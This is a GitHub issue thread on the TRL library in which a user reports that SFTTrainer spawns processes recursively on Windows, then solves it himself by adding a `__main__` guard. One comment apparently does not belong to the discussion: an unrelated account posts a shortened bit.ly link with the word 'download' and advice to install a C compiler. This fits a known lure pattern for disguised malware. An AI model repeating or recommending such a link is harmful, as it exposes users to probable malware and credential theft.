### ISSUE TITLE
Multiple Processes Spawning As A Result of SFTTrainer

### ISSUE THREAD

**Issue by davidoygenblik** [huggingface/trl#2084]
### System Info

- `transformers` version: 4.44.2
- Platform: Windows-10-10.0.22631-SP0
- Python version: 3.10.14
- Huggingface_hub version: 0.25.0
- Safetensors version: 0.4.5
- Accelerate version: 0.34.2
- Accelerate config:    not found
- PyTorch version (GPU?): 2.4.1+cu124 (True)
- Tensorflow version (GPU?): not installed (NA)
- Flax version (CPU?/GPU?/TPU?): not installed (NA)
- Jax version: not installed
- JaxLib version: not installed
- Using distributed or parallel set-up in script?: Unsure
- Using GPU in script?: Yes
- GPU type: NVIDIA GeForce RTX 4090

### Information

- [ ] The official example scripts
- [X] My own modified scripts

### Tasks

- [ ] An officially supported task in the `examples` folder
- [X] My own task or dataset (give details below)

### Reproduction

Following the code snippet from: https://huggingface.co/datasets/unsloth/notebooks/blob/main/Alpaca_%2B_Llama_7b_full_example.ipynb

I am running unsloth on Windows 11 following one of the notebook's code in a local environment.
It got to the SFT trainer and then spawns 3 processes? It does this recursively by the way so if I continue it, each SFT trainer will spawn three other processes. 
I made sure to check it was actually loading the model in each one (5 GB in GPU memory went up to 20 something when it spawned the processes). It never gets around to reaching past the SFTTrainer creation line, just spawns a new process and starts again. Any ideas?

### Expected behavior

Should create the trainer and begin training without spawning new processes...

**Comment by aries2004-bit** [comment]
download

https://bit.ly/4eugCty
If you don't have the c compliator, install it.(gcc or clang)

**Comment by davidoygenblik** [comment]
Silly error... Ensure all your code is within the following when running on windows:
`if __name__ == '__main__':`
